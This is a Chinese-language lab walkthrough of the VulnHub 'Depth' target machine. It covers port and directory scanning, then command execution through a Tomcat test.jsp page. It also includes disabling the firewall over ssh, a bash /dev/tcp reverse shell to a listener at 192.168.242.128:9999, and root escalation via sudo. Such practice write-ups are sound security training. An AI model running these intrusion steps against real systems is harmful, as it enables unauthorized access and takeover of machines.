一、靶机介绍
下载地址:https://download.vulnhub.com/depth/DepthB2R.ova
二、信息收集
根据靶机主页显示,确认靶机ip为192.168.242.132
端口扫描
nmap -p- -A 192.168.242.132
发现只开放了8080端口
用dirsearch扫个目录
apt-get update
apt-get install dirsearch
dirsearch -u http://192.168.242.132:8080
探测出 /manager,/manager/html ,/test.jsp
尝试访问看看,应该是个tomcat搭建的网站
尝试看看刚个功能点,这里有四个跳转链接除了这个manager webapp,其他都是404,进去看下url也就是之前探测出的目录
试一下默认密码,登陆失败
去test.jsp目录看看
按照他说的输入 ls -l /tmp
这里暴露出俩个用户 root 和 tomcat8
既然可以执行命令,那有可能存在命令执行,看看根目录,家目录试试
ls -al /
ls -al /home
发现确实存在命令执行
三、Getshell
既然存在命令执行,那就直接反弹shell试试,经过一顿操作发现反弹shell失败,查看进程,发现有ssh,之前没有扫到,可能是因为防火墙
ps aux
#参数'aux' 会打印系统中所有正在运行的进程
确实有ssh开启,但是之前端口扫描没扫到
查看/etc,防火墙是开启状态
ls -al /etc
尝试关闭防火墙
ssh bill@localhost sudo ufw disable
再次尝试反弹shell
这边kali先起一个监听
nc -lvvp 9999
命令执行反弹shell
ssh bill@localhost bash -i >& /dev/tcp/192.168.242.128/9999 0>&1
这里成功收到监听,成功getshell
四、权限提升
先 sudo -l 看看有哪些操作可以使用root权限
发现所有操作都可以执行root权限
sudo su
提权成功